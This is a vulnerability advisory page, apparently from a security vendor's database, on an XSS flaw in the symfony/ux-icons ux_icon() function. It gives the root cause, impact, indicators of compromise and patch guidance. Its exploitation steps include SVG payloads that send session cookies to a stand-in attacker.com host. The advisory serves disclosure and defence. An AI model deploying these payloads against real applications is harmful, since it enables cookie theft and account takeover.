CVE-2026-55877
PHP Analyse et atténuation des vulnérabilités

Aperçu

CVE-2026-55877 is a Cross-Site Scripting (XSS) vulnerability in the symfony/ux-icons Composer package, affecting the ux_icon() Twig function which inlines SVG content verbatim into rendered HTML pages without adequate sanitization. The vulnerability affects versions >=2.17.0, <2.36.1 in the 2.x series and >=3.0.0, <3.2.0 in the 3.x series. It was disclosed on June 19, 2026, with patched versions 2.36.1 and 3.2.0 released simultaneously. The vulnerability carries a CVSS v3.1 base score of 6.1 (Medium/Moderate) (GitHub Advisory, Symfony Advisory).

Détails techniques

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). Because ux_icon() is declared is_safe=['html'], Twig bypasses its normal output escaping, and Icon::toHtml() inlines raw SVG markup directly into the page. Two distinct code paths are vulnerable: (1) the local file path via Icon::fromFile(), which only stripped <script> elements that were direct children of <svg>, leaving nested scripts and all on* event-handler attributes intact; and (2) the Iconify on-demand path (enabled by default), where the remote JSON body field was wrapped into an Icon object with zero sanitization. Attack vectors include a malicious SVG icon pack from a third-party theme or downloaded icon set, or a controlled/poisoned Iconify endpoint configured via iconify.endpoint (GitHub Advisory, symfony/ux Advisory).

Impact

Successful exploitation allows an unauthenticated attacker who can supply malicious icon packs or control the Iconify endpoint to inject and execute arbitrary JavaScript in the browsers of users visiting the affected application. This can result in session cookie theft, account takeover, unauthorized actions performed on behalf of victims, and redirection to malicious sites. Confidentiality and integrity are both partially impacted (low), while availability is unaffected, and the scope change indicates the impact crosses the security boundary of the vulnerable component into the user's browser context (GitHub Advisory, Feedly).

Étapes d’exploitation

  1. Identify a target: Locate a Symfony application using symfony/ux-icons in an affected version (2.17.0–2.36.0 or 3.0.0–3.1.x) that renders icons via the ux_icon() Twig function.
  2. Choose an attack vector: Either (a) supply a malicious SVG icon file to the application's icon directory (e.g., via a third-party theme or icon pack installation), or (b) control or poison the Iconify API endpoint configured in iconify.endpoint.
  3. Craft a malicious SVG payload: Create an SVG file containing a nested <script> element (bypassing the shallow child-only strip) or an on* event-handler attribute, e.g., <svg><g><script>document.location='https://attacker.com/?c='+document.cookie</script></g></svg> or <svg onload="fetch('https://attacker.com/?c='+document.cookie)">.
  4. Deliver the payload: Place the malicious SVG in the icon pack directory, or serve it from a controlled Iconify-compatible endpoint so the application fetches and caches it.
  5. Trigger victim rendering: Lure a victim user to visit a page that renders the malicious icon via {{ ux_icon('malicious-icon') }}.
  6. Execute JavaScript: The browser executes the injected script in the context of the application's origin, enabling session theft, credential harvesting, or further attacks (GitHub Advisory, symfony/ux Advisory).

Indicateurs de compromis

  • File System: Unexpected or recently modified SVG files in the application's icon directories containing <script>, on* attributes, javascript: URIs, or <foreignObject>/<iframe>/<object>/<embed> elements.
  • Network: Unusual outbound HTTP requests from the web server to unknown or attacker-controlled Iconify-compatible endpoints; unexpected DNS lookups or HTTP requests to external domains originating from user browsers after visiting icon-rendering pages.
  • Logs: Web server or application logs showing requests to icon-fetching endpoints with unexpected body content in Iconify API responses; cache files containing SVG payloads with script-capable constructs.
  • Browser/Client-Side: User-reported unexpected redirects, session invalidation, or anomalous requests to external domains after visiting pages that render icons.

Atténuation et solutions de contournement

Update symfony/ux-icons to version 2.36.1 (for the 2.x series) or 3.2.0 (for the 3.x series), which introduce a centralized IconFactory sanitizer that removes <script>, <foreignObject>, <iframe>, <object>, <embed>, SMIL animations, CDATA sections, processing instructions, all on* attributes, and javascript:, vbscript:, and data:text/html URL schemes before any Icon object is created. Until patching is possible, restrict or disable the use of untrusted third-party icon packs and avoid configuring untrusted iconify.endpoint values. Implementing a strict Content Security Policy (CSP) that disallows inline scripts can significantly reduce the impact of any residual XSS risk (GitHub Advisory, Symfony Advisory).

Réactions de la communauté

The vulnerability was reported by Pascal Cescon and fixed by Hugo Alliaume (Kocal), with the advisory published by Symfony maintainer fabpot on June 19, 2026 (symfony/ux Advisory). A Reddit thread in r/symfony discussed the CVE shortly after disclosure, indicating community awareness (Reddit). No major media coverage or notable external researcher commentary beyond the official advisory has been observed at this time.

Ressources additionnelles


SourceCe rapport a été généré à l’aide de l’IA

Apparenté PHP Vulnérabilités:

Identifiant CVE

Sévérité

Score

Technologies

Nom du composant

Exploit CISA KEV

A corrigé

Date de publication

CVE-2026-55878HIGH7.8
  • PHP logoPHP
  • cpe:2.3:a:sensiolabs:symfony
NonOuiJul 08, 2026
CVE-2026-55877MEDIUM6.1
  • PHP logoPHP
  • composer://symfony/ux-icons
NonOuiJul 08, 2026
CVE-2026-48492MEDIUM4.9
  • PHP logoPHP
  • snipe/snipe-it
NonOuiJul 08, 2026
GHSA-gq4g-fpc9-vjfqLOW2.9
  • PHP logoPHP
  • web-auth/webauthn-lib
NonOuiJul 07, 2026
CVE-2026-55542LOW1.3
  • PHP logoPHP
  • snipe/snipe-it
NonOuiJul 08, 2026

Évaluation gratuite des vulnérabilités

Évaluez votre posture de sécurité dans le cloud

Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.

Demander une évaluation

Obtenez une démo personnalisée

Prêt(e) à voir Wiz en action ?

"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
David EstlickRSSI
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
Adam FletcherChef du service de sécurité
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."
Greg PoniatowskiResponsable de la gestion des menaces et des vulnérabilités